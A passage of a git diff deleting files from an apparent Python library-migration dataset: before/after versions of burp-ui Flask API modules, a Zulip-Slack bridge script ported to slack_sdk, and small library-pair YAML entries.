s['agent'] = k - try: - s['status'] = api.bui.cli.get_counters(c, agent=k) - except BUIserverException: - s['status'] = [] - r.append(s) - else: # pragma: no cover - for c in l: - s = {} - s['client'] = c - try: - s['status'] = api.bui.cli.get_counters(c, agent=server) - except BUIserverException: - s['status'] = [] - r.append(s) - return jsonify(results=r) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.target.py deleted file mode 100644 index 1462435..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.target.py +++ /dev/null @@ -1,97 +0,0 @@ -# -*- coding: utf8 -*- - -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restplus import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/servers.json', endpoint='api.servers_stats') -class ServersStats(Resource): - """The :class:`burpui.api.servers.ServersStats` resource allows you to - retrieve statistics about servers/agents. - - This resource is part of the :mod:`burpui.api.servers` module. - """ - - @login_required - def get(self): - r = [] - if hasattr(api.bui.cli, 'servers'): # pragma: no cover - check = False - allowed = [] - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - check = True - allowed = api.bui.acl.servers(current_user.get_id()) - for serv in api.bui.cli.servers: - try: - if check: - if serv in allowed: - r.append({'name': serv, - 'clients': len(api.bui.cli.servers[serv].get_all_clients(serv)), - 'alive': api.bui.cli.servers[serv].ping()}) - else: - r.append({'name': serv, - 'clients': len(api.bui.cli.servers[serv].get_all_clients(serv)), - 'alive': api.bui.cli.servers[serv].ping()}) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=r) - - -@api.resource('/api/live.json', - '/api//live.json', - endpoint='api.live') -class Live(Resource): - """The :class:`burpui.api.servers.Live` resource allows you to - retrieve a list of servers that are currently *alive*. - - This resource is part of the :mod:`burpui.api.servers` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """API: live - :returns: the live status of the server - """ - if not server: - server = self.parser.parse_args()['server'] - r = [] - if server: - l = (api.bui.cli.is_one_backup_running(server))[server] - else: - l = api.bui.cli.is_one_backup_running() - if isinstance(l, dict): # pragma: no cover - for (k, a) in iteritems(l): - for c in a: - s = {} - s['client'] = c - s['agent'] = k - try: - s['status'] = api.bui.cli.get_counters(c, agent=k) - except BUIserverException: - s['status'] = [] - r.append(s) - else: # pragma: no cover - for c in l: - s = {} - s['client'] = c - try: - s['status'] = api.bui.cli.get_counters(c, agent=server) - except BUIserverException: - s['status'] = [] - r.append(s) - return jsonify(results=r) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.diff deleted file mode 100644 index 10e9d0d..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/settings.py b/burpui/api/settings.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/settings.py - +++ b/burpui/api/settings.py -@@ -11,7 +11,7 @@ import sys - - # This is a submodule we can also use "from ..api import api" - from . import api --from flask.ext.restful import reqparse, abort, Resource -+from flask.ext.restplus import reqparse, abort, Resource - from flask.ext.login import current_user, login_required - from flask import jsonify, request, url_for - from werkzeug.datastructures import ImmutableMultiDict diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.source.py deleted file mode 100644 index 1eb6bef..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.source.py +++ /dev/null @@ -1,311 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.settings - :platform: Unix - :synopsis: Burp-UI settings api module. - -.. moduleauthor:: Ziirish - -""" -import sys - -# This is a submodule we can also use "from ..api import api" -from . import api -from flask.ext.restful import reqparse, abort, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify, request, url_for -from werkzeug.datastructures import ImmutableMultiDict -if sys.version_info >= (3, 0): - from urllib.parse import unquote -else: - from urllib import unquote - - -@api.resource('/api/settings/server-config', - '/api//settings/server-config', - '/api/settings/server-config/', - '/api//settings/server-config/', - endpoint='api.server_settings') -class ServerSettings(Resource): - """The :class:`burpui.api.settings.ServerSettings` resource allows you to - read and write the server's configuration. - - This resource is part of the :mod:`burpui.api.settings` module. - """ - - @login_required - def post(self, conf=None, server=None): - noti = api.bui.cli.store_conf_srv(request.form, conf, server) - return {'notif': noti}, 200 - - @login_required - def get(self, conf=None, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "boolean": [ - "daemon", - "fork", - "..." - ], - "defaults": { - "address": "", - "autoupgrade_dir": "", - "ca_burp_ca": "", - "ca_conf": "", - "ca_name": "", - "ca_server_name": "", - "client_can_delete": true, - "...": "..." - }, - "integer": [ - "port", - "status_port", - "..." - ], - "multi": [ - "keep", - "restore_client", - "..." - ], - "placeholders": { - "autoupgrade_dir": "path", - "ca_burp_ca": "path", - "ca_conf": "path", - "ca_name": "name", - "ca_server_name": "name", - "client_can_delete": "0|1", - "...": "..." - }, - "results": { - "boolean": [ - { - "name": "hardlinked_archive", - "value": false - }, - { - "name": "syslog", - "value": true - }, - { "...": "..." } - ], - "clients": [ - { - "name": "testclient", - "value": "/etc/burp/clientconfdir/testclient" - } - ], - "common": [ - { - "name": "mode", - "value": "server" - }, - { - "name": "directory", - "value": "/var/spool/burp" - }, - { "...": "..." } - ], - "includes": [], - "includes_ext": [], - "integer": [ - { - "name": "port", - "value": 4971 - }, - { - "name": "status_port", - "value": 4972 - }, - { "...": "..." } - ], - "multi": [ - { - "name": "keep", - "value": [ - "7", - "4" - ] - }, - { "...": "..." } - ] - }, - "server_doc": { - "address": "Defines the main TCP address that the server listens on. The default is either '::' or '0.0.0.0', dependent upon compile time options.", - "...": "..." - }, - "string": [ - "mode", - "address", - "..." - ], - "suggest": { - "compression": [ - "gzip1", - "gzip2", - "gzip3", - "gzip4", - "gzip5", - "gzip6", - "gzip7", - "gzip8", - "gzip9" - ], - "mode": [ - "client", - "server" - ], - "...": [] - } - } - - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above. - """ - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - abort(403, message='Sorry, you don\'t have rights to access the setting panel') - - try: - conf = unquote(conf) - except: - pass - r = api.bui.cli.read_conf_srv(conf, server) - return jsonify(results=r, - boolean=api.bui.cli.get_parser_attr('boolean_srv', server), - string=api.bui.cli.get_parser_attr('string_srv', server), - integer=api.bui.cli.get_parser_attr('integer_srv', server), - multi=api.bui.cli.get_parser_attr('multi_srv', server), - server_doc=api.bui.cli.get_parser_attr('doc', server), - suggest=api.bui.cli.get_parser_attr('values', server), - placeholders=api.bui.cli.get_parser_attr('placeholders', server), - defaults=api.bui.cli.get_parser_attr('defaults', server)) - - -@api.resource('/api/settings/clients.json', - '/api//settings/clients.json', - endpoint='api.clients_list') -class ClientsList(Resource): - - @login_required - def get(self, server=None): - res = api.bui.cli.clients_list(server) - return jsonify(result=res) - - -@api.resource('/api/settings//client-config', - '/api/settings//client-config/', - '/api//settings//client-config', - '/api//settings//client-config/', - endpoint='api.client_settings') -class ClientSettings(Resource): - - @login_required - def post(self, server=None, client=None, conf=None): - noti = api.bui.cli.store_conf_cli(request.form, client, conf, server) - return jsonify(notif=noti) - - @login_required - def get(self, server=None, client=None, conf=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - abort(403, message='Sorry, you don\'t have rights to access the setting panel') - - try: - conf = unquote(conf) - except: - pass - r = api.bui.cli.read_conf_cli(client, conf, server) - return jsonify(results=r, - boolean=api.bui.cli.get_parser_attr('boolean_cli', server), - string=api.bui.cli.get_parser_attr('string_cli', server), - integer=api.bui.cli.get_parser_attr('integer_cli', server), - multi=api.bui.cli.get_parser_attr('multi_cli', server), - server_doc=api.bui.cli.get_parser_attr('doc', server), - suggest=api.bui.cli.get_parser_attr('values', server), - placeholders=api.bui.cli.get_parser_attr('placeholders', server), - defaults=api.bui.cli.get_parser_attr('defaults', server)) - - -@api.resource('/api/settings/new-client', - '/api//settings/new-client', - endpoint='api.new_client') -class NewClient(Resource): - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('newclient', type=str) - - @login_required - def put(self, server=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - return {'notif': [[2, 'Sorry, you don\'t have rights to access the setting panel']]}, 403 - - newclient = self.parser.parse_args()['newclient'] - if not newclient: - return {'notif': [[2, 'No client name provided']]}, 400 - # clientconfdir = api.bui.cli.get_parser_attr('clientconfdir', server) - # if not clientconfdir: - # flash('Could not proceed, no \'clientconfdir\' find', 'warning') - # return redirect(request.referrer) - noti = api.bui.cli.store_conf_cli(ImmutableMultiDict(), newclient, None, server) - if server: - noti.append([3, '
Click here to edit \'{}\' configuration'.format(url_for('view.cli_settings', server=server, client=newclient), newclient)]) - else: - noti.append([3, 'Click here to edit \'{}\' configuration'.format(url_for('view.cli_settings', client=newclient), newclient)]) - return {'notif': noti}, 201 - - -@api.resource('/api/settings/path-expander', - '/api//settings/path-expander', - '/api/settings/path-expander/', - '/api//settings/path-expander/', - endpoint='api.path_expander') -class PathExpander(Resource): - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('path') - - @login_required - def get(self, server=None, client=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - noti = [[2, 'Sorry, you don\'t have rights to access the setting panel']] - return {'notif': noti}, 403 - - path = self.parser.parse_args()['path'] - paths = api.bui.cli.expand_path(path, client, server) - if not paths: - noti = [[2, "Path not found"]] - return {'notif': noti}, 500 - return {'result': paths} - - -@api.resource('/api/settings/delete-client', - '/api//settings/delete-client', - '/api/settings/delete-client/', - '/api//settings/delete-client/', - endpoint='api.delete_client') -class DeleteClient(Resource): - - @login_required - def delete(self, server=None, client=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - noti = [[2, 'Sorry, you don\'t have rights to access the setting panel']] - return {'notif': noti}, 403 - - return {'notif': api.bui.cli.delete_client(client, server)}, 200 diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.target.py deleted file mode 100644 index 14d1cfb..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.target.py +++ /dev/null @@ -1,311 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.settings - :platform: Unix - :synopsis: Burp-UI settings api module. - -.. moduleauthor:: Ziirish - -""" -import sys - -# This is a submodule we can also use "from ..api import api" -from . import api -from flask.ext.restplus import reqparse, abort, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify, request, url_for -from werkzeug.datastructures import ImmutableMultiDict -if sys.version_info >= (3, 0): - from urllib.parse import unquote -else: - from urllib import unquote - - -@api.resource('/api/settings/server-config', - '/api//settings/server-config', - '/api/settings/server-config/', - '/api//settings/server-config/', - endpoint='api.server_settings') -class ServerSettings(Resource): - """The :class:`burpui.api.settings.ServerSettings` resource allows you to - read and write the server's configuration. - - This resource is part of the :mod:`burpui.api.settings` module. - """ - - @login_required - def post(self, conf=None, server=None): - noti = api.bui.cli.store_conf_srv(request.form, conf, server) - return {'notif': noti}, 200 - - @login_required - def get(self, conf=None, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "boolean": [ - "daemon", - "fork", - "..." - ], - "defaults": { - "address": "", - "autoupgrade_dir": "", - "ca_burp_ca": "", - "ca_conf": "", - "ca_name": "", - "ca_server_name": "", - "client_can_delete": true, - "...": "..." - }, - "integer": [ - "port", - "status_port", - "..." - ], - "multi": [ - "keep", - "restore_client", - "..." - ], - "placeholders": { - "autoupgrade_dir": "path", - "ca_burp_ca": "path", - "ca_conf": "path", - "ca_name": "name", - "ca_server_name": "name", - "client_can_delete": "0|1", - "...": "..." - }, - "results": { - "boolean": [ - { - "name": "hardlinked_archive", - "value": false - }, - { - "name": "syslog", - "value": true - }, - { "...": "..." } - ], - "clients": [ - { - "name": "testclient", - "value": "/etc/burp/clientconfdir/testclient" - } - ], - "common": [ - { - "name": "mode", - "value": "server" - }, - { - "name": "directory", - "value": "/var/spool/burp" - }, - { "...": "..." } - ], - "includes": [], - "includes_ext": [], - "integer": [ - { - "name": "port", - "value": 4971 - }, - { - "name": "status_port", - "value": 4972 - }, - { "...": "..." } - ], - "multi": [ - { - "name": "keep", - "value": [ - "7", - "4" - ] - }, - { "...": "..." } - ] - }, - "server_doc": { - "address": "Defines the main TCP address that the server listens on. The default is either '::' or '0.0.0.0', dependent upon compile time options.", - "...": "..." - }, - "string": [ - "mode", - "address", - "..." - ], - "suggest": { - "compression": [ - "gzip1", - "gzip2", - "gzip3", - "gzip4", - "gzip5", - "gzip6", - "gzip7", - "gzip8", - "gzip9" - ], - "mode": [ - "client", - "server" - ], - "...": [] - } - } - - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above. - """ - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - abort(403, message='Sorry, you don\'t have rights to access the setting panel') - - try: - conf = unquote(conf) - except: - pass - r = api.bui.cli.read_conf_srv(conf, server) - return jsonify(results=r, - boolean=api.bui.cli.get_parser_attr('boolean_srv', server), - string=api.bui.cli.get_parser_attr('string_srv', server), - integer=api.bui.cli.get_parser_attr('integer_srv', server), - multi=api.bui.cli.get_parser_attr('multi_srv', server), - server_doc=api.bui.cli.get_parser_attr('doc', server), - suggest=api.bui.cli.get_parser_attr('values', server), - placeholders=api.bui.cli.get_parser_attr('placeholders', server), - defaults=api.bui.cli.get_parser_attr('defaults', server)) - - -@api.resource('/api/settings/clients.json', - '/api//settings/clients.json', - endpoint='api.clients_list') -class ClientsList(Resource): - - @login_required - def get(self, server=None): - res = api.bui.cli.clients_list(server) - return jsonify(result=res) - - -@api.resource('/api/settings//client-config', - '/api/settings//client-config/', - '/api//settings//client-config', - '/api//settings//client-config/', - endpoint='api.client_settings') -class ClientSettings(Resource): - - @login_required - def post(self, server=None, client=None, conf=None): - noti = api.bui.cli.store_conf_cli(request.form, client, conf, server) - return jsonify(notif=noti) - - @login_required - def get(self, server=None, client=None, conf=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - abort(403, message='Sorry, you don\'t have rights to access the setting panel') - - try: - conf = unquote(conf) - except: - pass - r = api.bui.cli.read_conf_cli(client, conf, server) - return jsonify(results=r, - boolean=api.bui.cli.get_parser_attr('boolean_cli', server), - string=api.bui.cli.get_parser_attr('string_cli', server), - integer=api.bui.cli.get_parser_attr('integer_cli', server), - multi=api.bui.cli.get_parser_attr('multi_cli', server), - server_doc=api.bui.cli.get_parser_attr('doc', server), - suggest=api.bui.cli.get_parser_attr('values', server), - placeholders=api.bui.cli.get_parser_attr('placeholders', server), - defaults=api.bui.cli.get_parser_attr('defaults', server)) - - -@api.resource('/api/settings/new-client', - '/api//settings/new-client', - endpoint='api.new_client') -class NewClient(Resource): - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('newclient', type=str) - - @login_required - def put(self, server=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - return {'notif': [[2, 'Sorry, you don\'t have rights to access the setting panel']]}, 403 - - newclient = self.parser.parse_args()['newclient'] - if not newclient: - return {'notif': [[2, 'No client name provided']]}, 400 - # clientconfdir = api.bui.cli.get_parser_attr('clientconfdir', server) - # if not clientconfdir: - # flash('Could not proceed, no \'clientconfdir\' find', 'warning') - # return redirect(request.referrer) - noti = api.bui.cli.store_conf_cli(ImmutableMultiDict(), newclient, None, server) - if server: - noti.append([3, 'Click here to edit \'{}\' configuration'.format(url_for('view.cli_settings', server=server, client=newclient), newclient)]) - else: - noti.append([3, 'Click here to edit \'{}\' configuration'.format(url_for('view.cli_settings', client=newclient), newclient)]) - return {'notif': noti}, 201 - - -@api.resource('/api/settings/path-expander', - '/api//settings/path-expander', - '/api/settings/path-expander/', - '/api//settings/path-expander/', - endpoint='api.path_expander') -class PathExpander(Resource): - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('path') - - @login_required - def get(self, server=None, client=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - noti = [[2, 'Sorry, you don\'t have rights to access the setting panel']] - return {'notif': noti}, 403 - - path = self.parser.parse_args()['path'] - paths = api.bui.cli.expand_path(path, client, server) - if not paths: - noti = [[2, "Path not found"]] - return {'notif': noti}, 500 - return {'result': paths} - - -@api.resource('/api/settings/delete-client', - '/api//settings/delete-client', - '/api/settings/delete-client/', - '/api//settings/delete-client/', - endpoint='api.delete_client') -class DeleteClient(Resource): - - @login_required - def delete(self, server=None, client=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - noti = [[2, 'Sorry, you don\'t have rights to access the setting panel']] - return {'notif': noti}, 403 - - return {'notif': api.bui.cli.delete_client(client, server)}, 200 diff --git a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.diff b/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.diff deleted file mode 100644 index 2b16446..0000000 --- a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.diff +++ /dev/null @@ -1,36 +0,0 @@ -diff --git a/zulip/integrations/bridge_with_slack/run-slack-bridge b/zulip/integrations/bridge_with_slack/run-slack-bridge - index 470967cfdb6b83433fa3e3ce69e22a793f96c428..2d9cf64db860ab5e5eabb8151254b0f3dab609bd 100644 - --- a/zulip/integrations/bridge_with_slack/run-slack-bridge - +++ b/zulip/integrations/bridge_with_slack/run-slack-bridge -@@ -7,7 +7,8 @@ import argparse - import traceback - import multiprocessing as mp - import zulip --import slack -+import slack_sdk -+from slack_sdk.rtm import RTMClient - from typing import Any, Dict, Callable - - import bridge_with_slack_config -@@ -44,10 +45,10 @@ class SlackBridge: - - # slack-specific - self.channel = self.slack_config["channel"] -- self.slack_client = slack.RTMClient(token=self.slack_config["token"], auto_reconnect=True) -+ self.slack_client = RTMClient(token=self.slack_config["token"], auto_reconnect=True) - # Spawn a non-websocket client for getting the users - # list and for posting messages in Slack. -- self.slack_webclient = slack.WebClient(token=self.slack_config["token"]) -+ self.slack_webclient = slack_sdk.WebClient(token=self.slack_config["token"]) - - def wrap_slack_mention_with_bracket(self, zulip_msg: Dict[str, Any]) -> None: - words = zulip_msg["content"].split(' ') -@@ -81,7 +82,7 @@ class SlackBridge: - self.slack_id_to_name = {u["id"]: u["profile"].get("display_name", u["profile"]["real_name"]) for u in members} - self.slack_name_to_id = {v: k for k, v in self.slack_id_to_name.items()} - -- @slack.RTMClient.run_on(event='message') -+ @RTMClient.run_on(event='message') - def slack_to_zulip(**payload: Any) -> None: - msg = payload['data'] - if msg['channel'] != self.channel: diff --git a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.source.py b/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.source.py deleted file mode 100644 index 40ef5fc..0000000 --- a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.source.py +++ /dev/null @@ -1,136 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -import sys -import os -import argparse -import traceback -import multiprocessing as mp -import zulip -import slack -from typing import Any, Dict, Callable - -import bridge_with_slack_config - -# change these templates to change the format of displayed message -ZULIP_MESSAGE_TEMPLATE = "**{username}**: {message}" -SLACK_MESSAGE_TEMPLATE = "<{username}> {message}" - -def check_zulip_message_validity(msg: Dict[str, Any], config: Dict[str, Any]) -> bool: - is_a_stream = msg["type"] == "stream" - in_the_specified_stream = msg["display_recipient"] == config["stream"] - at_the_specified_subject = msg["subject"] == config["topic"] - - # We do this to identify the messages generated from Matrix -> Zulip - # and we make sure we don't forward it again to the Matrix. - not_from_zulip_bot = msg["sender_email"] != config["email"] - if is_a_stream and not_from_zulip_bot and in_the_specified_stream and at_the_specified_subject: - return True - return False - -class SlackBridge: - def __init__(self, config: Dict[str, Any]) -> None: - self.config = config - self.zulip_config = config["zulip"] - self.slack_config = config["slack"] - - # zulip-specific - self.zulip_client = zulip.Client( - email=self.zulip_config["email"], - api_key=self.zulip_config["api_key"], - site=self.zulip_config["site"]) - self.zulip_stream = self.zulip_config["stream"] - self.zulip_subject = self.zulip_config["topic"] - - # slack-specific - self.channel = self.slack_config["channel"] - self.slack_client = slack.RTMClient(token=self.slack_config["token"], auto_reconnect=True) - # Spawn a non-websocket client for getting the users - # list and for posting messages in Slack. - self.slack_webclient = slack.WebClient(token=self.slack_config["token"]) - - def wrap_slack_mention_with_bracket(self, zulip_msg: Dict[str, Any]) -> None: - words = zulip_msg["content"].split(' ') - for w in words: - if w.startswith('@'): - zulip_msg["content"] = zulip_msg["content"].replace(w, '<' + w + '>') - - def replace_slack_id_with_name(self, msg: Dict[str, Any]) -> None: - words = msg['text'].split(' ') - for w in words: - if w.startswith('<@') and w.endswith('>'): - _id = w[2:-1] - msg['text'] = msg['text'].replace(_id, self.slack_id_to_name[_id]) - - def zulip_to_slack(self) -> Callable[[Dict[str, Any]], None]: - def _zulip_to_slack(msg: Dict[str, Any]) -> None: - message_valid = check_zulip_message_validity(msg, self.zulip_config) - if message_valid: - self.wrap_slack_mention_with_bracket(msg) - slack_text = SLACK_MESSAGE_TEMPLATE.format(username=msg["sender_full_name"], - message=msg["content"]) - self.slack_webclient.chat_postMessage( - channel=self.channel, - text=slack_text, - ) - return _zulip_to_slack - - def run_slack_listener(self) -> None: - members = self.slack_webclient.users_list()['members'] - # See also https://api.slack.com/changelog/2017-09-the-one-about-usernames - self.slack_id_to_name = {u["id"]: u["profile"].get("display_name", u["profile"]["real_name"]) for u in members} - self.slack_name_to_id = {v: k for k, v in self.slack_id_to_name.items()} - - @slack.RTMClient.run_on(event='message') - def slack_to_zulip(**payload: Any) -> None: - msg = payload['data'] - if msg['channel'] != self.channel: - return - user_id = msg['user'] - user = self.slack_id_to_name[user_id] - from_bot = user == self.slack_config['username'] - if from_bot: - return - self.replace_slack_id_with_name(msg) - content = ZULIP_MESSAGE_TEMPLATE.format(username=user, message=msg['text']) - msg_data = dict( - type="stream", - to=self.zulip_stream, - subject=self.zulip_subject, - content=content) - self.zulip_client.send_message(msg_data) - - self.slack_client.start() - -if __name__ == "__main__": - usage = """run-slack-bridge - - Relay each message received at a specified subject in a specified stream from - the first realm to a channel in a Slack workspace. - """ - - sys.path.append(os.path.join(os.path.dirname(__file__), '..')) - parser = argparse.ArgumentParser(usage=usage) - - print("Starting slack mirroring bot") - print("MAKE SURE THE BOT IS SUBSCRIBED TO THE RELEVANT ZULIP STREAM") - - config = bridge_with_slack_config.config - - backoff = zulip.RandomExponentialBackoff(timeout_success_equivalent=300) - while backoff.keep_going(): - try: - sb = SlackBridge(config) - - zp = mp.Process(target=sb.zulip_client.call_on_each_message, args=(sb.zulip_to_slack(),)) - sp = mp.Process(target=sb.run_slack_listener, args=()) - print("Starting message handler on Zulip client") - zp.start() - print("Starting message handler on Slack client") - sp.start() - - zp.join() - sp.join() - except Exception: - traceback.print_exc() - backoff.fail() diff --git a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.target.py b/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.target.py deleted file mode 100644 index 70b57d4..0000000 --- a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.target.py +++ /dev/null @@ -1,137 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -import sys -import os -import argparse -import traceback -import multiprocessing as mp -import zulip -import slack_sdk -from slack_sdk.rtm import RTMClient -from typing import Any, Dict, Callable - -import bridge_with_slack_config - -# change these templates to change the format of displayed message -ZULIP_MESSAGE_TEMPLATE = "**{username}**: {message}" -SLACK_MESSAGE_TEMPLATE = "<{username}> {message}" - -def check_zulip_message_validity(msg: Dict[str, Any], config: Dict[str, Any]) -> bool: - is_a_stream = msg["type"] == "stream" - in_the_specified_stream = msg["display_recipient"] == config["stream"] - at_the_specified_subject = msg["subject"] == config["topic"] - - # We do this to identify the messages generated from Matrix -> Zulip - # and we make sure we don't forward it again to the Matrix. - not_from_zulip_bot = msg["sender_email"] != config["email"] - if is_a_stream and not_from_zulip_bot and in_the_specified_stream and at_the_specified_subject: - return True - return False - -class SlackBridge: - def __init__(self, config: Dict[str, Any]) -> None: - self.config = config - self.zulip_config = config["zulip"] - self.slack_config = config["slack"] - - # zulip-specific - self.zulip_client = zulip.Client( - email=self.zulip_config["email"], - api_key=self.zulip_config["api_key"], - site=self.zulip_config["site"]) - self.zulip_stream = self.zulip_config["stream"] - self.zulip_subject = self.zulip_config["topic"] - - # slack-specific - self.channel = self.slack_config["channel"] - self.slack_client = RTMClient(token=self.slack_config["token"], auto_reconnect=True) - # Spawn a non-websocket client for getting the users - # list and for posting messages in Slack. - self.slack_webclient = slack_sdk.WebClient(token=self.slack_config["token"]) - - def wrap_slack_mention_with_bracket(self, zulip_msg: Dict[str, Any]) -> None: - words = zulip_msg["content"].split(' ') - for w in words: - if w.startswith('@'): - zulip_msg["content"] = zulip_msg["content"].replace(w, '<' + w + '>') - - def replace_slack_id_with_name(self, msg: Dict[str, Any]) -> None: - words = msg['text'].split(' ') - for w in words: - if w.startswith('<@') and w.endswith('>'): - _id = w[2:-1] - msg['text'] = msg['text'].replace(_id, self.slack_id_to_name[_id]) - - def zulip_to_slack(self) -> Callable[[Dict[str, Any]], None]: - def _zulip_to_slack(msg: Dict[str, Any]) -> None: - message_valid = check_zulip_message_validity(msg, self.zulip_config) - if message_valid: - self.wrap_slack_mention_with_bracket(msg) - slack_text = SLACK_MESSAGE_TEMPLATE.format(username=msg["sender_full_name"], - message=msg["content"]) - self.slack_webclient.chat_postMessage( - channel=self.channel, - text=slack_text, - ) - return _zulip_to_slack - - def run_slack_listener(self) -> None: - members = self.slack_webclient.users_list()['members'] - # See also https://api.slack.com/changelog/2017-09-the-one-about-usernames - self.slack_id_to_name = {u["id"]: u["profile"].get("display_name", u["profile"]["real_name"]) for u in members} - self.slack_name_to_id = {v: k for k, v in self.slack_id_to_name.items()} - - @RTMClient.run_on(event='message') - def slack_to_zulip(**payload: Any) -> None: - msg = payload['data'] - if msg['channel'] != self.channel: - return - user_id = msg['user'] - user = self.slack_id_to_name[user_id] - from_bot = user == self.slack_config['username'] - if from_bot: - return - self.replace_slack_id_with_name(msg) - content = ZULIP_MESSAGE_TEMPLATE.format(username=user, message=msg['text']) - msg_data = dict( - type="stream", - to=self.zulip_stream, - subject=self.zulip_subject, - content=content) - self.zulip_client.send_message(msg_data) - - self.slack_client.start() - -if __name__ == "__main__": - usage = """run-slack-bridge - - Relay each message received at a specified subject in a specified stream from - the first realm to a channel in a Slack workspace. - """ - - sys.path.append(os.path.join(os.path.dirname(__file__), '..')) - parser = argparse.ArgumentParser(usage=usage) - - print("Starting slack mirroring bot") - print("MAKE SURE THE BOT IS SUBSCRIBED TO THE RELEVANT ZULIP STREAM") - - config = bridge_with_slack_config.config - - backoff = zulip.RandomExponentialBackoff(timeout_success_equivalent=300) - while backoff.keep_going(): - try: - sb = SlackBridge(config) - - zp = mp.Process(target=sb.zulip_client.call_on_each_message, args=(sb.zulip_to_slack(),)) - sp = mp.Process(target=sb.run_slack_listener, args=()) - print("Starting message handler on Zulip client") - zp.start() - print("Starting message handler on Slack client") - sp.start() - - zp.join() - sp.join() - except Exception: - traceback.print_exc() - backoff.fail() diff --git a/v1/data/libpair/appdirs,platformdirs.yaml b/v1/data/libpair/appdirs,platformdirs.yaml deleted file mode 100644 index 769371c..0000000 --- a/v1/data/libpair/appdirs,platformdirs.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: appdirs,platformdirs -source: appdirs -target: platformdirs -domain: Utilities diff --git a/v1/data/libpair/argparse,configargparse.yaml b/v1/data/libpair/argparse,configargparse.yaml deleted file mode 100644 index 827e1ff..0000000 --- a/v1/data/libpair/argparse,configargparse.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: argparse,configargparse -source: argparse -target: configargparse -domain: Utilities diff --git a/v1/data/libpair/attr,attrs.yaml b/v1/data/libpair/attr,attrs.yaml deleted file mode 100644 index 08a5ed9..0000000 --- a/v1/data/libpair/attr,attrs.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: attr,attrs -source: attr -target: attrs -domain: Utilities diff --git a/v1/data/libpair/celery,rq.yaml b/v1/data/libpair/celery,rq.yaml deleted file mode 100644 index 79f2405..0000000 